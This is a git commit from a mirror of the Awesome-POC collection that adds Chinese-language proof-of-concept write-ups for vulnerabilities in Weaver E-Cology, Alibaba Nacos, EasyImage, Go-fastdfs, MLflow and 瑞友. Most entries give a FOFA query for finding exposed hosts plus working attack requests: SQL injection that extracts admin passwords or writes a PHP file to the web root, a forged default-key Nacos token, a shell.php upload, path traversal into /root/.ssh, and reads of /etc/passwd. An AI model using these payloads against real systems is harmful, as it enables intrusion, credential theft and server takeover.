mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 02:37:58 +00:00
更新漏洞
This commit is contained in:
Threekiii
parent
886c5bb019
commit
2740b45e84
BIN
OA产品漏洞/images/image-20230417093344265.png
Normal file
BIN
OA产品漏洞/images/image-20230417093344265.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 628 KiB |
BIN
OA产品漏洞/images/image-20230417093412026.png
Normal file
BIN
OA产品漏洞/images/image-20230417093412026.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 877 KiB |
32
OA产品漏洞/泛微OA v9 E-Cology browser.jsp SQL注入漏洞.md
Normal file
32
OA产品漏洞/泛微OA v9 E-Cology browser.jsp SQL注入漏洞.md
Normal file
@ -0,0 +1,32 @@
|
||||
# 泛微OA v9 E-Cology browser.jsp SQL注入漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
泛微OA E-Cology browser.jsp 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息,进一步进行攻击
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
泛微 E-Cology v9
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
product="泛微-协同商务系统"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登陆页面
|
||||
|
||||
|
||||
|
||||
验证POC, 将SQL语句进行3次URL编码
|
||||
|
||||
```
|
||||
asdasdasxx%' union select 1,(select password from HrmResourceManager where id=1) union select 1,'1
|
||||
/mobile/%20/plugin/browser.jsp?isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%38%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%34%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31
|
||||
```
|
||||
|
||||
|
||||
12
README.md
12
README.md
@ -121,6 +121,7 @@
|
||||
* 泛微OA ln.FileDownload 任意文件读取漏洞
|
||||
* 泛微OA sysinterfacecodeEdit.jsp 任意文件上传漏洞
|
||||
* 泛微OA uploadOperation.jsp 任意文件上传
|
||||
* 泛微OA v9 E-Cology browser.jsp SQL注入漏洞
|
||||
* 泛微OA weaver.common.Ctrl 任意文件上传漏洞
|
||||
* 泛微OA WorkflowCenterTreeData SQL注入漏洞
|
||||
* 用友 ERP-NC NCFindWeb 目录遍历漏洞
|
||||
@ -191,7 +192,9 @@
|
||||
* Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293
|
||||
* Alibaba AnyProxy fetchBody 任意文件读取漏洞
|
||||
* Alibaba Canal config 云密钥信息泄露漏洞
|
||||
* Alibaba Nacos secret.key默认密钥 未授权访问漏洞
|
||||
* Alibaba Nacos 未授权访问漏洞
|
||||
* Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592
|
||||
* Appspace jsonprequest SSRF漏洞 CVE-2021-27670
|
||||
* Atlassian Bitbucket archive 远程命令执行漏洞 CVE-2022-36804
|
||||
* Atlassian Bitbucket 登录绕过漏洞
|
||||
@ -219,6 +222,8 @@
|
||||
* Dogtag PKI XML实体注入漏洞 CVE-2022-2414
|
||||
* Dolibarr edit.php 远程命令执行漏洞 CVE-2022-40871
|
||||
* E-message 越权访问漏洞
|
||||
* EasyImage down.php 任意文件读取漏洞
|
||||
* EasyImage manager.php 后台任意文件上传漏洞
|
||||
* eGroupWare spellchecker.php 远程命令执行漏洞
|
||||
* Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞
|
||||
* Evolucare Ecsimaging new_movie.php 远程命令执行漏洞
|
||||
@ -233,6 +238,8 @@
|
||||
* GitLab SSRF漏洞 CVE-2021-22214
|
||||
* GitLab 任意文件读取导致RCE CVE-2020-10977
|
||||
* GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914
|
||||
* Go-fastdfs GetClientIp 未授权访问漏洞
|
||||
* Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800
|
||||
* Grafana mysql 后台任意文件读取漏洞 CVE-2019-19499
|
||||
* Grafana plugins 任意文件读取漏洞 CVE-2021-43798
|
||||
* H3C IMC dynamiccontent.properties.xhtm 远程命令执行
|
||||
@ -259,6 +266,7 @@
|
||||
* MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543
|
||||
* Metabase geojson 任意文件读取漏洞 CVE-2021-41277
|
||||
* MKdocs 任意文件读取漏洞 CVE-2021-40978
|
||||
* MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177
|
||||
* Nexus Repository Manger change-password 低权限修改管理员密码漏洞 CVE-2020-11444
|
||||
* Nexus Repository Manger extdirect 后台远程命令执行 CVE-2020-10204
|
||||
* Nexus Repository Manger extdirect 远程命令执行 CVE-2019-7238
|
||||
@ -350,6 +358,7 @@
|
||||
* 深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
|
||||
* 深信服 日志中心 c.php 远程命令执行漏洞
|
||||
* 深信服 行为感知系统 c.php 远程命令执行漏洞
|
||||
* 瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞
|
||||
* 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
|
||||
* 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
|
||||
* 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
|
||||
@ -376,7 +385,6 @@
|
||||
* 银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437
|
||||
* 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞
|
||||
* 阿尔法科技 虚拟仿真实验室 未授权访问漏洞
|
||||
* 阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592
|
||||
* 零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113
|
||||
* 章管家 Druid未授权访问漏洞
|
||||
* 飞视美 视频会议系统 Struts2 远程命令执行漏洞
|
||||
@ -509,6 +517,7 @@
|
||||
* Microsoft Exchange 信息泄露漏洞 CVE-2020-17143
|
||||
* Microsoft Exchange 远程命令执行 CVE-2021-27065 26857 26858
|
||||
* MinIO SSRF漏洞 CVE-2021-21287
|
||||
* MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432
|
||||
* MySQL UDF提权
|
||||
* NVIDIA GPU显示驱动程序 信息泄露 CVE-2021-1056
|
||||
* OpenSSH 命令注入漏洞 CVE-2020-15778
|
||||
@ -654,6 +663,7 @@
|
||||
* 小米 路由器 extdisks 任意文件读取漏洞 CVE-2019-18371
|
||||
* 悦泰节能 智能数据网关 resources 任意文件读取漏洞
|
||||
* 惠尔顿 e地通 config.xml 信息泄漏漏洞
|
||||
* 才茂通信 网关 formping 远程命令执行漏洞
|
||||
* 朗视 TG400 GSM 网关目录遍历 CVE-2021-27328
|
||||
* 浙江宇视科技 网络视频录像机 ISC LogReport.php 远程命令执行漏洞
|
||||
* 烽火 HG6245D info.asp 信息泄露漏洞
|
||||
|
||||
35
Web应用漏洞/Alibaba Nacos secret.key默认密钥 未授权访问漏洞.md
Normal file
35
Web应用漏洞/Alibaba Nacos secret.key默认密钥 未授权访问漏洞.md
Normal file
@ -0,0 +1,35 @@
|
||||
# Alibaba Nacos secret.key默认密钥 未授权访问漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
Alibaba Nacos 使用了固定的secret.key默认密钥,导致攻击者可以构造请求获取敏感信息,导致未授权访问漏洞
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
Alibaba Nacos <= 2.2.0
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="NACOS"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登陆页面
|
||||
|
||||
|
||||
|
||||
漏洞原因是使用了固定的Key
|
||||
|
||||
|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9
|
||||
```
|
||||
|
||||
|
||||
@ -0,0 +1,22 @@
|
||||
# Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
Alibaba otter manager分布式数据库同步系统是基于数据库增量日志解析,准实时同步到本机房或异地机房的mysql/oracle数据库,一个分布式数据库同步系统。阿里巴巴otter manager分布式数据库同步系统存在信息泄露漏洞,攻击者可利用漏洞获取zookper信息。
|
||||
|
||||
参考链接:
|
||||
|
||||
* https://www.cnvd.org.cn/flaw/show/CNVD-2021-16592
|
||||
* https://forum.ywhack.com/thread-115309-1-8.html
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
title="Otter Manager"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
默认口令:`admin/admin`
|
||||
|
||||
进入后直接f12查看元素,修改password为text即可查看数据库等敏感信息密码。
|
||||
31
Web应用漏洞/EasyImage down.php 任意文件读取漏洞.md
Normal file
31
Web应用漏洞/EasyImage down.php 任意文件读取漏洞.md
Normal file
@ -0,0 +1,31 @@
|
||||
# EasyImage down.php 任意文件读取漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
EasyImage down.php 文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
EasyImage
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="EasyImage-简单图床"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
主页面
|
||||
|
||||
|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/application/down.php?dw=./config/config.php
|
||||
```
|
||||
|
||||
|
||||
86
Web应用漏洞/EasyImage manager.php 后台任意文件上传漏洞.md
Normal file
86
Web应用漏洞/EasyImage manager.php 后台任意文件上传漏洞.md
Normal file
@ -0,0 +1,86 @@
|
||||
# EasyImage manager.php 后台任意文件上传漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
EasyImage manager.php 存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件到服务器获取服务器权限
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
EasyImage
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="EasyImage-简单图床"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
主页面
|
||||
|
||||
|
||||
|
||||
登陆后台后发送POC (通过任意文件读取获取账号密码)
|
||||
|
||||
```
|
||||
POST /admin/manager.php?p= HTTP/1.1
|
||||
Host:
|
||||
Accept: application/json
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
|
||||
Cache-Control: no-cache
|
||||
Content-Length: 1622
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEUCF9Yq83AkaO6sv
|
||||
Cookie: Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680341989; auth=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22tossone%22%3Bi%3A1%3Bs%3A32%3A%22590368bca375c2f8fe93df7d253481e8%22%3B%7D; Hm_lpvt_c790ac2bdc2f385757ecd0183206108d=1680342144; filemanager=sdeemhj3b9aeoretftrlijjh25
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
|
||||
|
||||
------WebKitFormBoundaryEUCF9Yq83AkaO6sv
|
||||
Content-Disposition: form-data; name="dzuuid"
|
||||
|
||||
7e4fad9a-3545-4ed6-b655-b3e3a6b2978c
|
||||
------WebKitFormBoundaryEUCF9Yq83AkaO6sv
|
||||
Content-Disposition: form-data; name="dzchunkindex"
|
||||
|
||||
0
|
||||
------WebKitFormBoundaryEUCF9Yq83AkaO6sv
|
||||
Content-Disposition: form-data; name="dztotalfilesize"
|
||||
|
||||
583
|
||||
------WebKitFormBoundaryEUCF9Yq83AkaO6sv
|
||||
Content-Disposition: form-data; name="dzchunksize"
|
||||
|
||||
10000000
|
||||
------WebKitFormBoundaryEUCF9Yq83AkaO6sv
|
||||
Content-Disposition: form-data; name="dztotalchunkcount"
|
||||
|
||||
1
|
||||
------WebKitFormBoundaryEUCF9Yq83AkaO6sv
|
||||
Content-Disposition: form-data; name="dzchunkbyteoffset"
|
||||
|
||||
0
|
||||
------WebKitFormBoundaryEUCF9Yq83AkaO6sv
|
||||
Content-Disposition: form-data; name="p"
|
||||
|
||||
|
||||
------WebKitFormBoundaryEUCF9Yq83AkaO6sv
|
||||
Content-Disposition: form-data; name="fullpath"
|
||||
|
||||
shell.php
|
||||
------WebKitFormBoundaryEUCF9Yq83AkaO6sv
|
||||
Content-Disposition: form-data; name="file"; filename="shell.php"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
234
|
||||
|
||||
------WebKitFormBoundaryEUCF9Yq83AkaO6sv--
|
||||
```
|
||||
|
||||
|
||||
|
||||
上传访问地址为
|
||||
|
||||
```
|
||||
/i/shell.php
|
||||
```
|
||||
65
Web应用漏洞/Go-fastdfs GetClientIp 未授权访问漏洞.md
Normal file
65
Web应用漏洞/Go-fastdfs GetClientIp 未授权访问漏洞.md
Normal file
@ -0,0 +1,65 @@
|
||||
# Go-fastdfs GetClientIp 未授权访问漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
Go-fastdfs GetClientIp方法存在XFF头绕过漏洞,攻击者通过漏洞可以未授权调用接口,获取配置文件等敏感信息
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
Go-fastdfs
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
"go-fastdfs"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
主页面
|
||||
|
||||
|
||||
|
||||
调用读取配置接口,返回 ip 不允许访问
|
||||
|
||||
```
|
||||
/group1/reload?action=get
|
||||
```
|
||||
|
||||
|
||||
|
||||
追踪错误信息代码
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
跟一下 GetClientIp方法,这里会从 X-Forwarded-For 等参数获取值
|
||||
|
||||
|
||||
|
||||
回到调用的起点,验证方法为调用 IsPeer 参数
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
这里主要是验证获取到的值是否为配置中的 AdminIps
|
||||
|
||||
|
||||
|
||||
在配置文件 cfg.json 中 admin_ips 默认为 127.0.0.1 (可被爆破)
|
||||
|
||||
|
||||
|
||||
所以通过设置 X-Forwarded-For 就可以绕过接口调用限制,执行修改配置文件等操作,验证POC
|
||||
|
||||
```
|
||||
/group1/reload?action=get
|
||||
|
||||
X-Forwarded-For: 127.0.0.1
|
||||
```
|
||||
|
||||
|
||||
78
Web应用漏洞/Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800.md
Normal file
78
Web应用漏洞/Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800.md
Normal file
@ -0,0 +1,78 @@
|
||||
# Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
Go-fastdfs upload 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,攻击服务器
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
Go-fastdfs
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
"go-fastdfs"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
主页面
|
||||
|
||||
|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
POST /group1/upload HTTP/1.1
|
||||
Host:
|
||||
Content-Length: 951
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryigj9M9EJykZc9u53
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Connection: close
|
||||
|
||||
------WebKitFormBoundaryigj9M9EJykZc9u53
|
||||
Content-Disposition: form-data; name="file"; filename="id"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
test
|
||||
------WebKitFormBoundaryigj9M9EJykZc9u53
|
||||
Content-Disposition: form-data; name="scene"
|
||||
|
||||
default
|
||||
------WebKitFormBoundaryigj9M9EJykZc9u53
|
||||
Content-Disposition: form-data; name="filename"
|
||||
|
||||
id_rsa
|
||||
------WebKitFormBoundaryigj9M9EJykZc9u53
|
||||
Content-Disposition: form-data; name="output"
|
||||
|
||||
json2
|
||||
------WebKitFormBoundaryigj9M9EJykZc9u53
|
||||
Content-Disposition: form-data; name="path"
|
||||
|
||||
../../../../../root/.ssh
|
||||
------WebKitFormBoundaryigj9M9EJykZc9u53
|
||||
Content-Disposition: form-data; name="code"
|
||||
|
||||
|
||||
------WebKitFormBoundaryigj9M9EJykZc9u53
|
||||
Content-Disposition: form-data; name="auth_token"
|
||||
|
||||
|
||||
------WebKitFormBoundaryigj9M9EJykZc9u53
|
||||
Content-Disposition: form-data; name="submit"
|
||||
|
||||
upload
|
||||
------WebKitFormBoundaryigj9M9EJykZc9u53--
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
51
Web应用漏洞/MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177.md
Normal file
51
Web应用漏洞/MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177.md
Normal file
@ -0,0 +1,51 @@
|
||||
# MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
使用 MLflow 模型注册表托管 MLflow 开源项目的用户 mlflow server或者 mlflow ui使用早于 MLflow 2.2.1 的 MLflow 版本的命令如果不限制谁可以查询其服务器(例如,通过使用云 VPC、入站请求的 IP 白名单或身份验证 /授权中间件)。
|
||||
|
||||
此问题仅影响运行 mlflow server和 mlflow ui命令。 不使用的集成 mlflow server或者 mlflow ui不受影响; 例如,Azure Machine Learning 上的 Databricks Managed MLflow 产品和 MLflow 不使用这些命令,并且不会以任何方式受到这些漏洞的影响。
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
MLflow < 2.2.1
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app.name="MLflow"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登陆页面
|
||||
|
||||
|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
POST /ajax-api/2.0/mlflow/registered-models/create
|
||||
Content-Type: application/json
|
||||
|
||||
{"name": "testfile"}
|
||||
```
|
||||
|
||||
|
||||
|
||||
```
|
||||
POST /ajax-api/2.0/mlflow/model-versions/create
|
||||
Content-Type: application/json
|
||||
|
||||
{"name": "testfile", "source": "/etc"}
|
||||
```
|
||||
|
||||
|
||||
|
||||
```
|
||||
/model-versions/get-artifact?path=passwd&name=testfile&version=1
|
||||
```
|
||||
|
||||
|
||||
BIN
Web应用漏洞/images/image-20230417093555107.png
Normal file
BIN
Web应用漏洞/images/image-20230417093555107.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 82 KiB |
BIN
Web应用漏洞/images/image-20230417093624167.png
Normal file
BIN
Web应用漏洞/images/image-20230417093624167.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 391 KiB |
BIN
Web应用漏洞/images/image-20230417093649928.png
Normal file
BIN
Web应用漏洞/images/image-20230417093649928.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 192 KiB |
BIN
Web应用漏洞/images/image-20230417093814404.png
Normal file
BIN
Web应用漏洞/images/image-20230417093814404.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 84 KiB |
BIN
Web应用漏洞/images/image-20230417093836998.png
Normal file
BIN
Web应用漏洞/images/image-20230417093836998.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 102 KiB |
BIN
Web应用漏洞/images/image-20230417093851779.png
Normal file
BIN
Web应用漏洞/images/image-20230417093851779.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 132 KiB |
BIN
Web应用漏洞/images/image-20230417093907298.png
Normal file
BIN
Web应用漏洞/images/image-20230417093907298.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 351 KiB |
BIN
Web应用漏洞/images/image-20230417094057151.png
Normal file
BIN
Web应用漏洞/images/image-20230417094057151.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 64 KiB |
BIN
Web应用漏洞/images/image-20230417094115549.png
Normal file
BIN
Web应用漏洞/images/image-20230417094115549.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 457 KiB |
BIN
Web应用漏洞/images/image-20230417094210473.png
Normal file
BIN
Web应用漏洞/images/image-20230417094210473.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 64 KiB |
BIN
Web应用漏洞/images/image-20230417094255974.png
Normal file
BIN
Web应用漏洞/images/image-20230417094255974.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 302 KiB |
BIN
Web应用漏洞/images/image-20230417094508409.png
Normal file
BIN
Web应用漏洞/images/image-20230417094508409.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 64 KiB |
BIN
Web应用漏洞/images/image-20230417094521737.png
Normal file
BIN
Web应用漏洞/images/image-20230417094521737.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 189 KiB |
BIN
Web应用漏洞/images/image-20230417094533985.png
Normal file
BIN
Web应用漏洞/images/image-20230417094533985.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 548 KiB |
BIN
Web应用漏洞/images/image-20230417094542486.png
Normal file
BIN
Web应用漏洞/images/image-20230417094542486.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 306 KiB |
BIN
Web应用漏洞/images/image-20230417094554500.png
Normal file
BIN
Web应用漏洞/images/image-20230417094554500.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 301 KiB |
BIN
Web应用漏洞/images/image-20230417094604965.png
Normal file
BIN
Web应用漏洞/images/image-20230417094604965.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 318 KiB |
BIN
Web应用漏洞/images/image-20230417094613037.png
Normal file
BIN
Web应用漏洞/images/image-20230417094613037.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 379 KiB |
BIN
Web应用漏洞/images/image-20230417094623353.png
Normal file
BIN
Web应用漏洞/images/image-20230417094623353.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 470 KiB |
BIN
Web应用漏洞/images/image-20230417100058531.png
Normal file
BIN
Web应用漏洞/images/image-20230417100058531.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 216 KiB |
BIN
Web应用漏洞/images/image-20230417100112324.png
Normal file
BIN
Web应用漏洞/images/image-20230417100112324.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 278 KiB |
BIN
Web应用漏洞/images/image-20230417100221820.png
Normal file
BIN
Web应用漏洞/images/image-20230417100221820.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 357 KiB |
BIN
Web应用漏洞/images/image-20230417100230696.png
Normal file
BIN
Web应用漏洞/images/image-20230417100230696.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 44 KiB |
BIN
Web应用漏洞/images/image-20230417100516425.png
Normal file
BIN
Web应用漏洞/images/image-20230417100516425.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 304 KiB |
BIN
Web应用漏洞/images/image-20230417100529493.png
Normal file
BIN
Web应用漏洞/images/image-20230417100529493.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 314 KiB |
BIN
Web应用漏洞/images/image-20230417100544162.png
Normal file
BIN
Web应用漏洞/images/image-20230417100544162.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 168 KiB |
BIN
Web应用漏洞/images/image-20230417100554583.png
Normal file
BIN
Web应用漏洞/images/image-20230417100554583.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 471 KiB |
41
Web应用漏洞/瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞.md
Normal file
41
Web应用漏洞/瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞.md
Normal file
@ -0,0 +1,41 @@
|
||||
# 瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
瑞友 应用虚拟化系统 GetBSAppUrl方法存在SQL注入漏洞,由于参数传入没有进行过滤导致存在SQL注入,攻击者通过漏洞可以获取数据库敏感信息
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
瑞友应用虚拟化系统 7.0.2.1
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
"CASMain.XGI?cmd=GetDirApp" && title=="瑞友应用虚拟化系统"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登陆页面
|
||||
|
||||
|
||||
|
||||
在 GetBSAppUrl 方法中存在SQL注入漏洞,通过漏洞可以写入Webshell文件
|
||||
|
||||
|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/index.php?s=/Agent/GetBSAppUrl/AppID/')%3bselect+0x3c3f70687020706870696e666f28293b3f3e+into+outfile+%27C%3a\\Program+Files+(x86)\\RealFriend\\Rap+Server\\WebRoot\\test7.php%27%23/123
|
||||
```
|
||||
|
||||
|
||||
|
||||
```
|
||||
/test7.php
|
||||
```
|
||||
|
||||
|
||||
@ -1,22 +0,0 @@
|
||||
# 阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
阿里巴巴otter manager分布式数据库同步系统是基于数据库增量日志解析,准实时同步到本机房或异地机房的mysql/oracle数据库,一个分布式数据库同步系统。阿里巴巴otter manager分布式数据库同步系统存在信息泄露漏洞,攻击者可利用漏洞获取zookper信息。
|
||||
|
||||
参考链接:
|
||||
|
||||
* https://www.cnvd.org.cn/flaw/show/CNVD-2021-16592
|
||||
